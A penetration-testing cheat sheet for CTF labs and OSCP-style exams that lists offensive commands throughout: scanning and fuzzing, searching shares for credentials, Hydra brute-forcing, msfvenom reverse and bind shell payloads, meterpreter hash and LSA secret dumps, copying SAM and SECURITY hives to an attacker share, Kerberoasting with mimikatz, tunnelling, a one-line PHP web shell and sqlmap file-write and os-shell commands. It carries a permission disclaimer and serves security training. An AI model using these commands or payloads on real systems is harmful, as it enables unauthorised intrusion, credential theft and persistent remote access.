CTF Cheat Sheet
This is a list of common commands you may find yourself using in CTF exercises, vulnerable labs and machines, or penetration testing courses. They can also be useful for the eJPT, OSCP and Hack The Box CPTS if you are pursuing any of those certifications. You are responsible for ensuring the commands you are using are allowed on your exam!
Please keep in mind many skills do not translate well to a cheat sheet format. Burp Suite and Zap Proxy, Vulnerability Scanning, Command Injection, and other topics are better covered in tutorials, classes, or videos. This is intended to save time by keeping some common command and tool examples in one place, not to take the place of training.
DISCLAIMER: Do not use ANY of these tools or commands unless you have permission to access the device you are testing. Some of these commands are unsafe and NOISY so don’t be a criminal and use this information responsibly!
Information Gathering
NMAP:
standard scan with scripts, version detection, no pings:
sudo nmap -sC -sV -Pn <host>
scan all ports, output all formats:
sudo nmap -p- -oA scan.txt <host>
scan top 1000 ports, OS detection:
sudo nmap --top-ports 1000 -O <host>
aggressive scan, all ports, output all formats:
sudo nmap -A -p- -iL <hosts.txt> -vv -oA agscan.txt
Find/run specific scripts:
locate scripts/<service>
sudo nmap --script <script name> -p<port> <host>
Host discovery:
sudo nmap 10.129.2.0/24 -sn -oA tnet | grep for | cut -d" " -f5
(outputs to file tnet and lists IPs in console)
Host discovery using list:
sudo nmap -sn -oA tnet -iL hosts.lst | grep for | cut -d" " -f5
WEB ENUMERATION:
Initial enumeration:
$ nikto -host <IP>
$ whatweb -a3 https://<url> -v
$ wafw00f -v https://<url>
Create wordlist via cewl:
$cewl -m5 --lowercase -w wordlist.txt http://<url>
DNS:
Dig examples:
$ dig @10.129.212.240 -t ANY inlanefreight.htb
$ dig @10.129.212.240 -t NS inlanefreight.htb
$ dig @10.129.212.240 -t TXT inlanefreight.htb
Zone transfers:
$nslookup -type=NS zonetransfer.me
$nslookup -type=any -query=AXFR zonetransfer.me nsztm1.digi.ninja Server:nsztm1.digi.ninja
$ nslookup -type=A -query=AXFR internal.inlanefreight.htb 10.129.212.240
FUZZING:
Virtual host via curl:
$ curl -s http://192.168.10.10 -H "Host: <url>"
vHost Fuzzing (fs is filter size for response)
$ ffuf -w ./vhosts -u http://<url> -H "HOST: FUZZ.<url>" -fs 612
$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/fierce-hostlist.txt -u http://<url> -H "HOST: FUZZ.<url>" -fs 10918
Directory Fuzzing:
$ feroxbuster --url http://<url>/
$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -t 100 -u http://<url>
$ ffuf -recursion -recursion-depth 1 -u http://<url>/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
Content Fuzzing:
gobuster content:
Content (generic)
$ gobuster dir -u http://10.10.10.93 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .html,.txt,.xml,.bak,.old
Content IIS
$ gobuster dir -u http://10.10.10.93 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .asp,.aspx,.txt,.ini,.tmp,.bak,.old
Content Apache
$ gobuster dir -u http://10.10.10.93 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x .js,.jsp,.php,.txt,.tmp,.bak,.old
ffuf content:
$ ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://<url>/FOLDERS/WORDLISTEXTENSIONS
$ ffuf -w /usr/share/wordlists/dirb/common.txt:FUZZ -u http://<url>/FUZZ.php
Pillaging
WINDOWS BUILT IN ENUMERATION:
Enumerating Installed Programs:
C:\> wmic product get name
C:\> dir 'C:\Program Files (x86)\'
Checking Windows Version
PS C:\> [environment]::OSVersion.Version
Enumerating Local Users:
C:\> dir C:\Users\
Enumerating Local Ports:
C:\> netstat -ano
Enumerating Running Service:
PS C:\> get-service | ? {$_.DisplayName -like 'Druva*'}
Networking Commands:
Lists all known hosts stored in the arp table:
C:\> arp -a
Prints out all adapter settings for the host:
C:\> ipconfig /all
Displays the routing table:
C:\> route print
Displays the status of the host's firewall:
C:\> netsh advfirewall show state
Get drives/shares:
PS C:\> Get-WmiObject Win32_NetworkConnection | Select-Object RemoteName, LocalName | Sort-Object LocalName | Format-Table -AutoSize
Find creds:
DIR
C:\>dir n:\*cred* /s /b
C:\>dir n:\*secret* /s /b
Windows CMD - Findstr
c:\>findstr /s /i cred n:\*.*
Find plaintext passwords:
C:\> findstr /si password *.xml *.ini *.txt
Windows PowerShell - Select-String
PS C:\> Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List
LINUX BUILT IN ENUMERATION:
Enumerate Users:
$ cat etc/passwd | grep sh$
$ ls /home/
Installed packages:
$ dpkg -l
Locate config files
$ find . | grep conf
Check sudo privileges:
$ sudo -l
Running processes:
$ ps -faux
Show routing table:
$ netstat -rn
Show active connections:
$ netstat -ptan
File transfers:
Python HTTP server
$sudo python3 -m http.server 80
Python FTP server:
$ python3 -m pyftpdlib -w --user=username --password=password
$ curl --user username:password ftp://127.0.0.1:2121/
SSH SCP:
$ scp backupscript.exe ubuntu@<ipAddressofTarget>:~/
SMB/Samba transfer from Linux to Windows:
Creating a Share with smbserver.py
$sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support AttkShare /home/kali/smbshare
Copy file from share to working directory:
C:\>copy \\<ip>\AttkShare\WinPEAS.zip WinPEAS.zip
Moving files to Share:
C:\> move sam.save \\<ip>\AttkShare
1 file(s) moved.
C:\> move security.save \\<ip>\AttkShare
1 file(s) moved.
SMB transfer if samba is present:
Start smbserver on attack box:
$ sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData /home/kali/OSCP/
Transfer from host:
$ smbclient //server/share -c 'put local-file'
Base64 transfer:
$ base64 shell.sh -w 0
<SNIP>
$ echo <SNIP> | base64 -d > shell.sh
Password Attacks
ONLINE/NETWORK ATTACKS:
Hydra:
$ hydra -L user.list -P password.list ssh://<host>
$ hydra -l username -P password.list rdp://<host>
$ hydra -L user.list -P password.list smb://<host>
non-standard port:
$ hydra -L user.list -P password.list -f ftp://<host>:212
Medusa:
$ medusa -M ftp -h <host> -U path/to/username_file -P path/to/password_file
$ medusa -M HTTP -h <host> -u username -p password -m USER-AGENT:"Agent"
$ medusa -M smbnt -H path/to/hosts_file -C path/to/pwdump_file -u username -m PASS:HASH
$ medusa -h <host> -u username -P Password_List.txt -M ssh -n 22
crackmapexec:
$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list
OFFLINE ATTACKS:
johntheripper:
Wordlist Mode:
$ john --wordlist=<wordlist_file> --rules <hash_file>
Built-in wordlist, specified format:
$ john --format=sha256 hashes_to_crack.txt
NTLM hash Cracking with hashcat:
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
Exploitation
Locating Exploits with searchsploit:
$ searchsploit <service> <version>
Copy to working directory with searchsploit:
$ searchsploit -m php/webapps/49909.py
msfvenom examples:
Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > /root/Downloads/exploits/exploit.elf
msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > /root/Downloads/exploits/exploit.sh
Linux bind shell x64 single stage
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Linux Meterpreter bind shell x86 multi stage
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > /root/Downloads/exploits/exploit.exe
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3 -f python
Windows Meterpreter bind shell
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe > shell.exe
Windows CMD Multi Stage
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
Windows CMD Single Stage
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.56 LPORT=445 -f dll -o rshell.dll
Scripting Languages
Python:
msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > exploit.py
Perl:
msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > exploit.pl
metasploit:
Specific Search
msf6 > search type:exploit platform:windows cve:2021 rank:excellent microsoft
msf6 > use <result number>
Searching for Specific Payload
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads
Permanent Target Specification
msf6 exploit(windows/smb/ms17_010_psexec) > setg RHOSTS <IP>
Stored Credentials
msf6 > creds -h
Stored Loot
msf6 > loot -h
Interact with session
msf6 > sessions -i <num>
meterpreter commands:
meterpreter > help
meterpreter > getuid
Local Exploit Suggester
meterpreter > bg
Background session 1? [y/N] y
msf6 exploit(windows/iis/iis_webdav_upload_asp) > search local_exploit_suggester
Dumping Hashes with meterpreter
meterpreter > hashdump
meterpreter > lsa_dump_sam
LSA Secrets Dump
meterpreter > lsa_dump_secrets
Privilege Escalation
WINDOWS:
winPEAS Enumeration:
.\winPEASany.exe quiet servicesinfo
.\winPEASany.exe quiet applicationsinfo
.\winPEASany.exe quiet windowscreds
.\winPEASany.exe quiet filesinfo userinfo
.\winPEASany.exe quiet cmd windowscreds
.\winPEAS.exe quiet cmd searchfast filesinfo
.\winPEAS.exe quiet procesinfo
Scheduled Tasks:
C:\>schtasks /query /fo LIST /v
PS> Get-ScheduledTask | wher [$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Running applications
C:\>task /V
Current User Privileges
C:\htb> whoami /priv
Current User Group Information
C:\htb> whoami /groups
Get All Users
C:\htb> net user
Get All Groups
C:\htb> net localgroup
Details About a Group
C:\htb> net localgroup administrators
Get Password Policy & Other Account Information
C:\htb> net accounts
Hot Potato - NTLM relay attack to gain SYSTEM, uses SMB Relay
./potato.exe -ip <IP> -cmd "C:\<shell.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true
RDP access via linux:
$ xfreerdp /u:user /p:password321 /cert:ignore /v:<IP>
LINUX:
Check sudo privileges:
$ sudo -l
Enumerate Users
$ cat etc/passwd | grep sh$
$ ls /home/
SSH Key locations:
/home/user/.ssh/id_rsa
/root/.ssh/id_rsa
SCP Linpeas with SSH access:
$ scp -P <port> linpeas.sh user1@<IP>:/home/<user>
$ scp -i ~/.ssh/id_rsa.pub FILENAME USER@SERVER:/home/USER/FILENAME
Active Directory
nmap scanning:
Script scan on SMB ports with OS detection:
$ sudo nmap -sV -sC -p 139,445 -Pn -O <host>
SMB Vulnerability scan:
$ sudo nmap -sV --script=sm-vuln* -p 139,445 <host>
Built-in Enumeration:
User Search
PS C:\> dsquery user
Computer Search
PS C:\> dsquery computer
Wildcard Search
PS C:\> dsquery * "CN=Users,DC=<domain>,DC=LOCAL"
WMIC:
Prints the patch level and description of the Hotfixes applied
PS C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn
Displays basic host information to include any attributes within the list
PS C:\> wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List
A listing of all processes on host
PS C:\> wmic process list /format:list
Displays information about the Domain and Domain Controllers
PS C:\> wmic ntdomain list /format:list
Displays information about all local accounts and any domain accounts that have logged into the device
PS C:\> wmic useraccount list /format:list
Information about all local groups
PS C:\> wmic group list /format:list
Dumps information about any system accounts that are being used as service accounts.
PS C:\> wmic sysaccount list /format:list
ActiveDirectory PowerShell Modules:
Discover Modules:
PS C:\> Get-Module
Import if needed:
PS C:\htb> Import-Module ActiveDirectory
Domain info:
PS C:\> Get-ADDomain
Get users (susceptible to kerberoast):
PS C:\> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
Check trusts:
PS C:\> Get-ADTrust -Filter *
Group Enumeration:
PS C:\> Get-ADGroup -Filter * | select name
PS C:\> Get-ADGroup -Identity "<group name>"
Group membership:
PS C:\> Get-ADGroupMember -Identity "Backup Operators"
Enumerating Trust Relationships:
Using Get-ADTrust
PS C:\htb> Import-Module activedirectory
PS C:\htb> Get-ADTrust -Filter *
Checking for Existing Trusts using Get-DomainTrust from PowerView
PS C:\> Import-Module .\PowerView.ps1
PS C:\htb> Get-DomainTrust
Using Get-DomainTrustMapping
PS C:\htb> Get-DomainTrustMapping
Checking Users in the Child Domain using Get-DomainUser
PS C:\htb> Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName
Bloodhound data collection:
From Linux:
$ sudo bloodhound-python -u '<user>' -p '<password>' -ns <host> -d <domain> -c all
Sharphound to collect data locally:
PS C:\> .\SharpHound.exe -c All --zipfilename ILFREIGHT
PowerView:
PS C:\> Import-Module .\PowerView.ps1
Domain User Information
PS C:\> Get-DomainUser -Identity mmorgan -Domain inlanefreight.local | Select-Object -Property name,samaccountname,description,memberof,whencreated,pwdlastset,lastlogontimestamp,accountexpires,admincount,userprincipalname,serviceprincipalname,useraccountcontrol
Recursive Group Membership
PS C:\> Get-DomainGroupMember -Identity "Domain Admins" -Recurse
Trust Enumeration
PS C:\> Get-DomainTrustMapping
Testing for Local Admin Access
PS C:\> Test-AdminAccess -ComputerName ACADEMY-EA-MS01
Finding Users With SPN Set (kerberoasting)
PS C:\> Get-DomainUser -SPN -Properties samaccountname,ServicePrincipalNam
Enumerating the Remote Desktop Users Group with PowerView:
PS C:\> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users"
Enumerating the Remote Management Users Group
PS C:\> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users"
SharpView, a .NET port of PowerView:
Check options:
PS C:\> .\SharpView.exe Get-DomainUser -Help
User info:
PS C:\> .\SharpView.exe Get-DomainUser -Identity forend
Enumeration from Linux:
With credentials:
crackmapexec:
Domain Enumeration:
$ sudo crackmapexec smb <host> -u <user> -p <password> --users
$ sudo crackmapexec smb <host> -u <user> -p <password> --groups
$ sudo crackmapexec smb <host> -u <user> -p <password> --loggedon-users
Enumerating Shares:
$ sudo crackmapexec smb <host> -u <user> -p <password> --shares
$ sudo crackmapexec smb <host> -u <user> -p <password> -M spider_plus --share '<share name>'
When completed, crackmapexec writes the results to a JSON file located at /tmp/cme_spider_plus/<ip of host>
smbmap:
Enumerating shares:
$ smbmap -u <user> -p <password> -d <DOMAIN> -H <host>
Recursive List Of All Directories:
$ smbmap -u <user> -p <password> -d <DOMAIN> -H <host> -R '<share name>' --dir-only
psexec.py:
psexec.py <domain>/<user>:'<password>'@<host>
Kerberoasting example:
Extracting Tickets from Memory with Mimikatz
mimikatz # base64 /out:true
mimikatz # kerberos::list /export
Preparing the Base64 Blob for Cracking
$ echo "<base64 blob>" | tr -d \\n
Extracting the Kerberos Ticket using kirbi2john.py
$ python2.7 kirbi2john.py sqldev.kirbi
This will create a file called crack_file. We then must modify the file to use Hashcat.
Modifiying crack_file for Hashcat
$ sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > tgs_hashcat
Viewing/Checking the Prepared Hash
$ cat tgs_hashcat
Cracking the Hash with Hashcat
$ hashcat -m 13100 tgs_hashcat /usr/share/wordlists/rockyou.txt
Pivoting
SSH Port Forwarding:
Executing the Local Port Forward
$ ssh -L 1234:localhost:3306 <user>@<attackhost>
The -L command tells the SSH client to request the SSH server to forward all the data we send via the port 1234 to localhost:3306
Confirming Port Forward with Netstat
$ netstat -antp | grep 1234
Confirming Port Forward with Nmap
$ nmap -v -sV -p1234 localhost
Similarly, if we want to forward multiple ports from the Ubuntu server to your localhost, you can do so by including the local port:server:port argument to your ssh command. For example, the below command forwards the apache web server's port 80 to your attack host's local port on 8080.
Multiple Port Forwarding
$ ssh -L 1234:localhost:3306 8080:localhost:80 <user>@<attackhost>
Proxychains:
Update proxychains.conf:
$ vi /etc/proxychains.conf
Checking /etc/proxychains.conf
$ tail -4 /etc/proxychains.conf
Using Nmap with Proxychains
$ proxychains nmap -v -sn 172.16.5.1-200
Using xfreerdp with Proxychains
$ proxychains xfreerdp /v:<host> /u:<user> /p:<password>
Port forwarding with meterpreter:
meterpreter > help portfwd
meterpreter > portfwd add -l 3300 -p 3389 -r <host>
Connecting to Windows Target through localhost
$ xfreerdp /v:localhost:3300 /u:<user> /p:<password>
DNS Tunneling with dnscat2:
Starting the dnscat2 server on attack
$ sudo ruby dnscat2.rb --dns host=<IP>,port=53,domain=<domain> --no-cache
Importing dnscat2.ps1 on target:
PS C:\> Import-Module .\dnscat2.ps1
Starting dnscat on target:
PS C:\> Start-Dnscat2 -DNSserver <IP> -Domain <domain> -PreSharedSecret <secretkey> -Exec cmd
SOCKS5 Tunneling with chisel:
Transferring Chisel Binary to Linux Pivot Host via SSH:
$ scp chisel <user>@<IP>:~/
Running the Chisel Server on the Pivot Host:
$ ./chisel server -v -p 1234 --socks5
Connecting to the Chisel Server
$ ./chisel client -v <IP>:1234 socks
Editing & Confirming proxychains.conf
$ vi /etc/proxychains.conf
$ tail -f /etc/proxychains.conf
Pivoting to Windows taget
$ proxychains xfreerdp /v:<IP> /u:<user> /p:<password>
Web Hacking
Check for verbs via curl:
$ curl -i -X OPTIONS http://SERVER_IP:PORT/
nmap Web Discovery, open ports, input list:
$nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list
Running eyewitness with nmap results:
$ eyewitness --web -x web_discovery.xml -d <domain name for output>
Simple PHP command shell:
$ echo '<?php system($_GET["cmd"]); ?>' > shell.php
Simple ASP command shell:
$echo '<% eval request('cmd') %>' > shell.asp
msfvenom PHP reverse shell:
$ msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php
SQLMAP:
Simple example:
$ sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
POST Example:
$ sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'
PUT Example:
$ sqlmap -u www.example.com --data='id=1'--method PUT
Full Request example:
$ sqlmap -r req.txt
Schema Enumeration:
$ sqlmap -u "http://www.example.com/?id=1" --schema
Table Enumeration:
$ sqlmap -u "http://www.example.com/?id=1" --tables -D <database>
Dump table data:
$ sqlmap -u "http://www.example.com/?id=1" --dump -T <table> -D <database>
Search for tables with names like 'user':
$ sqlmap -u "http://www.example.com/?id=1" --search -T user
Search for columns with names like 'pass':
$ sqlmap -u "http://www.example.com/?id=1" --search -C pass
Read local file:
$ sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
Write local file:
$ sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
Spawn a shell:
$ sqlmap -u "http://www.example.com/?id=1" --os-shell
Tags: CTF Cheat Sheet, OSCP Cheat Sheet, eJPT Cheat Sheet Last Updated: May 2023